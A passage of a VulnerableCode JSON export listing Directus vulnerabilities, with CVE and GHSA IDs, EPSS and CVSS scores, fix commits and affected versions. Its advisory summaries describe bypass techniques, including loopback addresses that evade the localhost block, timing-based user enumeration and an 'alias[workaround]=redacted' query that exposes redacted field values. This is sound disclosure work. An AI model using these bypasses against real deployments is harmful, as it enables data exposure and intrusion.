"https://api.first.org/data/v1/epss?cve=CVE-2025-64748", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15913", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15946", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15936", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.158", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64748" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204", "reference_id": "7737d56e096f95edfbdf861a3c08999ad31ce204", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/" } ], "url": "https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64748", "reference_id": "CVE-2025-64748", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64748" }, { "reference_url": "https://github.com/advisories/GHSA-8jpw-gpr4-8cmh", "reference_id": "GHSA-8jpw-gpr4-8cmh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8jpw-gpr4-8cmh" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh", "reference_id": "GHSA-8jpw-gpr4-8cmh", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:39:19Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35193?format=api", "purl": "pkg:npm/directus@11.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0" } ], "aliases": [ "CVE-2025-64748", "GHSA-8jpw-gpr4-8cmh" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qfnx-egwg-ybgp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37995?format=api", "vulnerability_id": "VCID-qrf3-cz1h-8kau", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. When relying on blocking access to localhost using the default `0.0.0.0` filter a user may bypass this block by using other registered loopback devices (like `127.0.0.2` - `127.127.127.127`). This issue has been addressed in release versions 10.13.3 and 11.1.0. Users are advised to upgrade. Users unable to upgrade may block this bypass by manually adding the `127.0.0.0/8` CIDR range which will block access to any `127.X.X.X` ip instead of just `127.0.0.1`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46990", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00237", "scoring_system": "epss", "scoring_elements": "0.47191", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00237", "scoring_system": "epss", "scoring_elements": "0.47188", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00237", "scoring_system": "epss", "scoring_elements": "0.47206", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00237", "scoring_system": "epss", "scoring_elements": "0.47051", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46990" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b", "reference_id": "4aace0bbe57232e38cd6a287ee475293e46dc91b", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b" }, { "reference_url": "https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52", "reference_id": "769fa22797bff5a9231599883b391e013f122e52", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52" }, { "reference_url": "https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff", "reference_id": "8cbf943b65fd4a763d09a5fdbba8996b1e7797ff", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/commit/8cbf943b65fd4a763d09a5fdbba8996b1e7797ff" }, { "reference_url": "https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431", "reference_id": "c1f3ccc681595038d094ce110ddeee38cb38f431", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/commit/c1f3ccc681595038d094ce110ddeee38cb38f431" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46990", "reference_id": "CVE-2024-46990", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46990" }, { "reference_url": "https://github.com/advisories/GHSA-68g8-c275-xf2m", "reference_id": "GHSA-68g8-c275-xf2m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-68g8-c275-xf2m" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m", "reference_id": "GHSA-68g8-c275-xf2m", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-18T18:14:11Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-68g8-c275-xf2m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33327?format=api", "purl": "pkg:npm/directus@10.13.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/33328?format=api", "purl": "pkg:npm/directus@11.0.0-rc.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.0.0-rc.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/33329?format=api", "purl": "pkg:npm/directus@11.1.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-3vnr-k31f-vycv" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-ghbw-eqaz-jqhs" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0" } ], "aliases": [ "CVE-2024-46990", "GHSA-68g8-c275-xf2m" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qrf3-cz1h-8kau" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/70838?format=api", "vulnerability_id": "VCID-rdpb-7dcd-fyby", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Before 11.14.1, a timing-based user enumeration vulnerability exists in the password reset functionality. When an invalid reset_url parameter is provided, the response time differs by approximately 500ms between existing and non-existing users, enabling reliable user enumeration. This vulnerability is fixed in 11.14.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26185", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02541", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02551", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02548", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03331", "published_at": "2026-06-14T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26185" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/pull/26485", "reference_id": "26485", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/" } ], "url": "https://github.com/directus/directus/pull/26485" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26185", "reference_id": "CVE-2026-26185", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26185" }, { "reference_url": "https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a", "reference_id": "e69aa7a5248c6e3e822cb1ac354dee295df90b2a", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/" } ], "url": "https://github.com/directus/directus/commit/e69aa7a5248c6e3e822cb1ac354dee295df90b2a" }, { "reference_url": "https://github.com/advisories/GHSA-jr94-gj3h-c8rf", "reference_id": "GHSA-jr94-gj3h-c8rf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jr94-gj3h-c8rf" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf", "reference_id": "GHSA-jr94-gj3h-c8rf", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-jr94-gj3h-c8rf" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.14.1", "reference_id": "v11.14.1", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-13T15:58:57Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.14.1" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39145?format=api", "purl": "pkg:npm/directus@11.14.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.1" } ], "aliases": [ "CVE-2026-26185", "GHSA-jr94-gj3h-c8rf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rdpb-7dcd-fyby" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/105820?format=api", "vulnerability_id": "VCID-rren-vtar-23fm", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, the exact Directus version number is incorrectly being used as OpenAPI Spec version this means that it is being exposed by the `/server/specs/oas` endpoint without authentication. With the exact version information a malicious attacker can look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. Version 11.9.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53887", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.55091", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.55216", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.55212", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00316", "scoring_system": "epss", "scoring_elements": "0.55228", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53887" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53887", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53887" }, { "reference_url": "https://github.com/directus/directus/pull/25353", "reference_id": "25353", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/" } ], "url": "https://github.com/directus/directus/pull/25353" }, { "reference_url": "https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3", "reference_id": "e74f3e4e92edc33b5f83eefb001a3d2a85af17a3", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/" } ], "url": "https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3" }, { "reference_url": "https://github.com/advisories/GHSA-rmjh-cf9q-pv7q", "reference_id": "GHSA-rmjh-cf9q-pv7q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rmjh-cf9q-pv7q" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q", "reference_id": "GHSA-rmjh-cf9q-pv7q", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.9.0", "reference_id": "v11.9.0", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.9.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/378353?format=api", "purl": "pkg:npm/directus@11.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0" } ], "aliases": [ "CVE-2025-53887", "GHSA-rmjh-cf9q-pv7q" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rren-vtar-23fm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49725?format=api", "vulnerability_id": "VCID-s39d-aw92-hydh", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. A user with permission to view any collection using redacted hashed fields can get access the raw stored version using the `alias` functionality on the API. Normally, these redacted fields will return `**********` however if we change the request to `?alias[workaround]=redacted` we can instead retrieve the plain text value for the field. This can be avoided by removing permission to view the sensitive fields entirely from users or roles that should not be able to see them. This vulnerability is fixed in 10.11.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-34708", "reference_id": 